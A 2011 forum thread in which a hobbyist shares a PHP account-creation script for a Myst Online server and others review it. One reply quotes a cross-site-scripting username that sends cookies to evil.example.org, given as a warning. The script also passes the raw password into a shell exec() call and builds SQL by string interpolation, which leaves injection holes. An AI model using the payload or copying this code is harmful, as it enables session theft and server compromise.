PHP Account Creation

Discussions About MOSS (Myst Online Server Software)

Moderator: a'moaca'

MercAngel
Member
Posts: 31
Joined: Tue Apr 19, 2011 8:55 pm

PHP Account Creation

Post by MercAngel » Mon May 02, 2011 4:56 am

hope this is the right place. i took an old php script for created account on Until uru and modified it for moss. i am sure there is a better way to do this but here is something any way.

it uses compute_auth_hash that comes with moss to create the pass word hash so make sure the user the runs httpd also has right to run compute_auth_hash also.
i also added a switch so you can have all user use them same @ address in there user name ex. username@myserver.com or it can be set to just use real e-mail.

Code for config.php

Code: Select all

<?php
	$dbhost = 'localhost';
	$dbport = '5432';
	$dbname = 'moss';
	$dbuser = 'moss';
	$dbpass = 'dbpass';
	$useemail = true; //If set to flase will use dbemal for last part of user name
	$dbemail = '@someplace.com';
	$passhash = 'compute_auth_hash'; //Full path to compute_auth_hash ex /use/local/moss/compute_auth_hash make sure user the runs httpd has right
	                                 //to run it 
?>
Code for new.php

Code: Select all

<?php
include('config.php');
	function check_name($var) {
	$var = stripslashes($var);
	$var = strip_tags($var);
	$var = preg_replace('/[\x80-\xFF]/', '', $var);
	$var = preg_replace("/[^a-zA-Z0-9@._s]/", '', $var);
	return $var;
}

if ($_GET['action'] == 'go') {
	if ($_POST['login'] == '' || $_POST['password'] == '')
		die ("You must enter a valid username and password! Click <a ".
         "href=\"javascript:history.back()\">here</a> to go back.");
  	if ($_POST['password'] != $_POST['password2'])
		die ("Your passwords don't match!  Please go <a ".
         "href=\"javascript:history.back()\">back</a> and re-enter it."); 

	$login = strtolower(check_name($_POST['login']));
	$pass = ($_POST['password']);

	$conn = pg_connect("host=$dbhost port=$dbport dbname=$dbname user=$dbuser password=$dbpass");
	if(!$conn) {
    	echo "Unable to connect to test database\n";
    	exit;
	}
    unset($dbpass); //do this to be safe
	
	if (!$useemail) {
		$name="$login$dbemail";
	} else {
		$name = "$login";
	}
	$result = pg_query($conn,"SELECT * FROM accounts WHERE name = '$name'");
	if (pg_num_rows($result) > 0) {
		echo "An account with that name already exists in the database.  If this ".
		"is not your account, please go <a href=\"javascript:history.back()\">".
		"back</a> and choose another login name.";
  	} else {
		$hash = exec("$passhash $name $pass");
		$res = pg_query($conn, "select uuid()");
		$uid = pg_fetch_result($res, 0);
		pg_query($conn,"insert into accounts values('$name','','$hash', '$uid', '','FALSE','FALSE')");
		echo "Congratulations, your account has been successfully created!<br>";
		echo "Your login is $name";
	}

    
} else {
unset($dbpass); //do this to be safe
?>
<html>
<head>
  <title>Moss Account Creation</title>
</head>

<body>
<h1>Moss Account Creation</h1>

<?php if (!$useemail) {
?>
<p>Please enter a username and password for logging into this Moss Shard.
   please choose a username and password that you will remember.  If you 
   forget your password, it can be reset, but it
   can't be retrieved, since the passwords are encrypted.<br>
   NOTE: you only need to enter a username <?php echo $dbemail; ?> will be auto added to then end of your name</p>
<br>
<form action="new.php?action=go" method="post">
<table border="0">
  <tr>
    <td>Login Name:</td>
    <td ><input type="text" name="login" maxlength="50" size="50"/></td>
  </tr><tr>
    <td>Password:</td>
    <td><input type="password" name="password" maxlength="50" size="50"/></td>
  </tr><tr>
    <td>Password again:</td>
    <td><input type="password" name="password2" maxlength="50" size="50"/></td>
  </tr>
</table><br>
<input type="submit" value="Create Account" />
</form>
<?php } else { ?> 
<p>Please enter a E-Mail and password for logging into this Moss Shard.
   please choose a E-mail and password that you will remember.  If you 
   forget your password, it can be reset, but it
   can't be retrieved, since the passwords are encrypted.</p>
<br>
<form action="new.php?action=go" method="post">
<table border="0">
  <tr>
    <td>E-Mail:</td>
    <td><input type="text" name="login" maxlength="50" size="50"/></td>
  </tr><tr>
    <td>Password:</td>
    <td><input type="password" name="password" maxlength="50" size="50"/></td>
  </tr><tr>
    <td>Password again:</td>
    <td><input type="password" name="password2" maxlength="50" size="50"/></td>
  </tr>
</table><br>
<input type="submit" value="Create Account" />
</form>
<?php } } ?>
</body>
</html>
Last edited by MercAngel on Mon May 02, 2011 8:13 pm, edited 4 times in total.

User avatar
Mac_Fife
Member
Posts: 1229
Joined: Fri Dec 19, 2008 12:38 am
Location: Scotland
Contact:

Re: PHP Account Creation

Post by Mac_Fife » Mon May 02, 2011 8:28 am

Yes, this is the right location MercAngel, and thanks for this.

I'm behind my office firewall just now and can't check this, but there may be some vulnerabilities in the script. Although you have stripslashes() to clean the $name input, I think someone could insert javascript as the user name, then a shard admin browsing a list of user names could be subject to a cross site scripting attack.

Let's say someone supplied this as the username (silly example):

Code: Select all

<script>document.location='http://evil.example.org/steal_cookies.php?cookies='+document.cookie</script>
The single quotes wouldn't be converted by stripslashes() so the string would go into the database unchanged (I think). If that string is then output to a webpage (as I suggested, maybe and admin viewing a list of accounts, and assuming javascript is enabled on the browser) it will cause a redirect to evil.example.org, passing any cookies associated with the page alongside the request.

Adding strip_tags() to the input cleansing would break the javascript. Also, setting some reasonable limit on the length of a name (the above example is >90 characters long) would make it harder to insert anything malicious.
Mac_Fife
OpenUru.org wiki wrangler

MercAngel
Member
Posts: 31
Joined: Tue Apr 19, 2011 8:55 pm

Re: PHP Account Creation

Post by MercAngel » Mon May 02, 2011 1:01 pm

ok it should now strip every thing but a-z. 0-9, @, and . from then name
also max length is 50

Nye_Sigismund
Member
Posts: 64
Joined: Wed Sep 29, 2010 12:59 pm

Re: PHP Account Creation

Post by Nye_Sigismund » Mon May 02, 2011 2:44 pm

I'd prefer to have underscores as well, personally - I'm not 100% on that but I believe that you can have underscores in email addresses? Just a bit of feedback. :)
Huw Dawson
Team Member
Team OSCAR

User avatar
Mac_Fife
Member
Posts: 1229
Joined: Fri Dec 19, 2008 12:38 am
Location: Scotland
Contact:

Re: PHP Account Creation

Post by Mac_Fife » Mon May 02, 2011 3:23 pm

Nye_Sigismund wrote:I'd prefer to have underscores as well, personally - I'm not 100% on that but I believe that you can have underscores in email addresses? Just a bit of feedback. :)
RFC5322 defines what is officially allowable in an email address and and underscore is allowable. Note that this supercedes and extends RFC2822 that a lot of systems still use - some things that 5322 allows aren't allowed by 2822 (like using periods in the local part).
Mac_Fife
OpenUru.org wiki wrangler

MercAngel
Member
Posts: 31
Joined: Tue Apr 19, 2011 8:55 pm

Re: PHP Account Creation

Post by MercAngel » Mon May 02, 2011 8:14 pm

fixed underscore not removed

User avatar
Mac_Fife
Member
Posts: 1229
Joined: Fri Dec 19, 2008 12:38 am
Location: Scotland
Contact:

Re: PHP Account Creation

Post by Mac_Fife » Mon May 02, 2011 8:56 pm

Great! Now we need to put this somewhere "safe" and easily findable - I'll leave this up to JW and a'moaca' to decide on, whether it belongs in the MOSS repo or on a related Website Tools repo or somewhere else. I can see the potential for a number of tools like this to support shard operators.
Mac_Fife
OpenUru.org wiki wrangler

User avatar
JWPlatt
Member
Posts: 1101
Joined: Sun Dec 07, 2008 7:32 pm
Location: Everywhere, all at once

Re: PHP Account Creation

Post by JWPlatt » Tue May 03, 2011 8:36 pm

I've created two accounts on the Atlantis shard and I cannot get a successful logon with either account.

MOSS Log:

Code: Select all

1304443451.652908 INFO auth.47e031a7:3879: AcctLoginRequest for jwplatt@atlantis.org (os: win)
1304443451.657751 MSGS auth.47e031a7:3879: (backend) Login failed, result=20
I don't know what the error code means, but if anyone has a chance to check, I'm thinking the php does not produce the same password hash that MOSS expects.
Perfect speed is being there.

User avatar
Mac_Fife
Member
Posts: 1229
Joined: Fri Dec 19, 2008 12:38 am
Location: Scotland
Contact:

Re: PHP Account Creation

Post by Mac_Fife » Tue May 03, 2011 10:23 pm

It's using the MOSS compute_auth_hash utility so the hash should be the same. The line I'm not sure about is this one:

Code: Select all

      $hash = exec("$passhash $name $pass");
Compute_auth_hash outputs the computed hash value followed by a newline. The exec() function returns the last line output by the command it executes, which might then mean that $hash will contain the hash plus the newline character and that's what's getting inserted into the database :? .
Maybe using exec() with the output parameter (which discards trailing whitespace) will work better?

Code: Select all

      $dummy = exec("$passhash $name $pass", $hashout = array());
      $hash = $hashout[0];
Mac_Fife
OpenUru.org wiki wrangler

User avatar
branan
Member
Posts: 84
Joined: Wed Apr 06, 2011 11:35 pm

Re: PHP Account Creation

Post by branan » Tue May 03, 2011 10:31 pm

Uru authentication is weird. There are two classes of account:
  1. Normal user accounts. These are identified by email addresses, and are double-hashed - the SHA-1 of the lowercase username concatenated with the password is taken, then an SHA-0 is taken of that SHA-1. The SHA-1 in this case is little-endian
  2. Special accounts. These are accounts with no @ in the name, or that end in @gametap. These accounts simply have the SHA-1 done - there is no second hash on these passwords. The SHA-1 in this case is big-endian


DirtSand always stores the little-endian SHA-1, and if the client authenticates with a "normal" account, it calculates the second hash of that SHA-1. If the client authenticates with a special (no @ or @gametap) account, it reverses the bytes in the hash. MOSS always stores the final hash, regardless of account type.


I just saw that the script is using the MOSS tool for this, so I'm going to assume that was written correctly. I'll post this anyway for the sake of it being relevent information to account management.
Last edited by branan on Tue May 03, 2011 11:03 pm, edited 1 time in total.

Post Reply

Return to “MOSS”

Who is online

Users browsing this forum: No registered users and 1 guest